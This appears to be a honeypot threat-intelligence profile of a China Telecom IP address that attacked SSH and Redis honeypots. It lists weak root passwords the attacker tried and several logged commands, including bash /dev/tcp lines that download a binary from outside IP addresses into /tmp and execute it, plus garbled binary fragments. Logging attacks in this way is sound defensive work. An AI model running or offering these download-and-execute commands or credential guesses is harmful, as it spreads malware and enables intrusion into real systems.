TROYANOSYVIRUS
Active Threat: MEDIUM

14.103.250.91

Country of Origin: 🇨🇳 China
First Detection: 3/26/2026
Last Activity: 4/13/2026
ISP: China Telecom Group
Total Attacks: 57
Ports: 2
Attack Types: 2
Malware: 2

Geolocation

Country
🇨🇳 China
City
Unknown
ASN
AS4811
ISP
China Telecom Group

Attack Types

ssh_telnet_honeypot
redis_honeypot

Attacked Ports

22
6379

Associated Malware

Attempted Credentials

🔐root/123456
1x
🔐root/12345678
1x
🔐root/password
1x

Executed Commands

$ nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/CRER9BSuaq && chmod +x /tmp/CRER9BSuaq && /tmp/CRER9BSuaq qnZNZM+JUyYTFbOmqzGisr0XDCxVm9BmS3jV1mNRZtiISS4PHb24qzKuqLoTEy5XiM9lSmbJ3mdFYdGKVSwdFrq8tDKrvaUWBCxJitNtSWbW1WK1kis+BJcGri9qCtmUXA5RgU0SsWEs5WlUxFJmfQ==" &
1x
$ head -c 1458464 > /tmp/WI1fQJc1Kr
1x
$ cat /bin/echo
1x
$ nohup bash -c "exec 6<>/dev/tcp/23.249.28.118/60132 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/boDE2NF5a0 && chmod +x /tmp/boDE2NF5a0 && /tmp/boDE2NF5a0 r7wKcXKU+43tBY0OUjFbGoMH8of9hm1zDLLc36kWc2WV4YXxDYMQUjJXAIQD7YX/lXJwDazA160CdGyX/YfjBoQUTTJSFZsG+ofhl254Dqzf3KihW/OZjEal6rAmN3TY2rtUghFzXmrg0NvLx0+XjA==" &
1x
$ cat /bin/echoQtd#UPX!
1x
$ >yoA@/;'8ELFP;i2
1x

Shodan InternetDB Exposure

InternetDB data, not real-time

Ports
22, 3306
Vulnerabilities
CVE-2023-48795, CVE-2007-2768, CVE-2023-38408, CVE-2008-3844, CVE-2023-51767, CVE-2025-26465, CVE-2023-51385, CVE-2021-36368, CVE-2021-41617, CVE-2024-6387, CVE-2016-20012, CVE-2025-32728
CPEs
cpe:/a:openbsd:openssh:8.7
cpe:/a:oracle:mysql

Risk Assessment

55/100
Scale: Low, Medium, High, Critical